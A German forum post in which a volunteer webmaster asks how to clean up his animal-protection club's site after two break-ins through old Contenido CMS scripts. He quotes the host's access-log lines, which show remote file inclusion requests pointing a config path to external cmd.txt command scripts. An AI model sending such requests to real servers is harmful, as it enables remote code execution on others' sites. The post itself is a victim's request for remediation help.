ich betreuer seit zig Jahren den Internet-Auftritt des Tierschutzvereins unter "tsv-neuss.de". Nun ist dieser innerhalb von 2 Tage zwei mal gehackt worden.
Mein Provider (profihost.com) hat daraufhin die Adresse gesperrt und mich in einer Mail informiert.
Gestern mit folgender Info:
Ich habe gestern daraufhin die Datei "include.subnav.php" in "...alt" umbenannt (und später gelöscht) und dann das aktuelle Contenido-Upgrade eingespielt und ausgeführt. Das hat wunderbar funktiniert.Grund hierfür sind von Ihnen verwendete unsichere Skripte. Über das folgende Skript kam der Angreifer:
srv005.infobox.ru - - [15/Jul/2008:13:13:31 +0200] "GET /contenido/includes/ include.subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt?HTTP/
1.1" 200 408 "-" "libwww-perl/5.803
Über das Skript wurde ein externes Skript aufgerufen, so konnten Befehle auf Ihrem Speicherplatz ausgeführt werden.
Heute erhalte ich wieder eine Mail von profihost mit folgendem Inhalt:
Nun zu meinen Fragen:Über das folgende Skript kam der Angreifer:
213.206.113.104 - - [15/Jul/2008:19:33:33 +0200] "GET /contenido/includes/include.newsletter_subnav.php?cfg[path][contenido]=http://rpgnet.com/newrpgnet/intranet/cmd.txt?
HTTP/1.1" 200 429 "-" "libwww-perl/5.805"
Über das Skript wurde ein externes Skript aufgerufen, so konnten Befehle auf Ihrem Speicherplatz ausgeführt werden.
Was muss ich machen, damit evt. noch weitere eingeschleuste Skripte weg sind? Oder: Welchen Inhalt des Webspaces kann / muss ich sicher löschen, um danach die aktuelle Version wieder neu einzuspielen?
Schöne Grüße vom für jede Hilfe dankbaren
Marten
)